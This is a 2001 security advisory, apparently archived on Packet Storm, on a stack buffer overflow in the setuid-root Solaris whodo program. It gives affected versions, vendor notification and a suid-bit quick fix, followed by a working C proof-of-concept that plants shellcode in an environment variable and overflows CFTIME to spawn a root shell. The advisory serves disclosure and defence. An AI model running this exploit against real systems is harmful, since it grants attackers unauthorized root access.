Solaris whodo local root exploit. Tested against SunOS 5.5.1, 5.7, and 5.8 for x86.
75132e64c0b577687b4b50af180faba96a00dcb5b64fa8ba8042f7cbbbd10957Vulnerability in Solaris whodo
Date Published: July 5, 2001
Advisory ID: N/A
Bugtraq ID: 2935
CVE CAN: Non currently assigned.
Title: Solaris whodo Buffer Overflow Vulnerability
Class: Boundary Error Condition
Remotely Exploitable: No
Locally Exploitable: Yes
Vulnerability Description:
The whodo program is installed setuid root by default in Solaris.
It contains a vulnerability in handling data from enviroment variables,
if this variable exceeds predefined lenght an exploitable stack overflow
can occur.
Through exploiting this vulnerability an attacker can gain effective
uid root.
Vulnerable Packages/Systems:
SunOS 5.8
SunOS 5.7
SunOS 5.5.1
(have not tested on other version)
Solution/Vendor :
Sun Microsystems was notified on June 28, 2001. Patches are excepted
shortly.
Quick Fix:
Clear the suid bit of
/usr/sbin/sparcv7/whodo (SunOS 5.8 Sparc)
/usr/sbin/i86/whodo (SunOS 5.8, 5.7 Intel)
/usr/sbin/whodo (SunOS 5.5.1)
Credits:
This vulnerability was discovered by Pablo Sor, Buenos Aires, Argentina.
psor@afip.gov.ar, psor@ccc.uba.ar
This advisory was drafted with the help of the SecurityFocus.com Vulnerability
Help Team. For more information or assistance drafting advisories please mail
vulnhelp@securityfocus.com.
Technical Description - Exploit/Concept Code:
#include <fcntl.h>
/*
/usr/sbin/i86/whodo overflow proof of conecpt.
Pablo Sor, Buenos Aires, Argentina 06/2001
psor@afip.gov.ar, psor@ccc.uba.ar
works against x86 solaris 8
default offset +/- 100 should work.
*/
long get_esp() { __asm__("movl %esp,%eax"); }
int main(int ac, char **av)
{
char shell[]=
"\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4"
"\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x8d\xe8\xdf"
"\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2\xff\xff\xff"
"\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53\x8d\x1e\x89\x5e\x08\x53"
"\xb0\x3b\xe8\xbb\xff\xff\xff\x83\xc4\x0c\xe8\xbb\xff\xff\xff\x2f"
"\x62\x69\x6e\x2f\x73\x68\xff\xff\xff\xff\xff\xff";
unsigned long magic = get_esp() + 1180; /* default offset */
unsigned char buf[800];
char *env;
env = (char *) malloc(400*sizeof(char));
memset(env,0x90,400);
memcpy(env+160,shell,strlen(shell));
memcpy(env,"SOR=",4);
buf[399]=0;
putenv(env);
memset(buf,0x41,800);
memcpy(buf+271,&magic,4);
memcpy(buf,"CFTIME=",7);
buf[799]=0;
putenv(buf);
system("/usr/sbin/i86/whodo");
}
--
Pablo Sor
psor@afip.gov.ar, psor@ccc.uba.ar
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed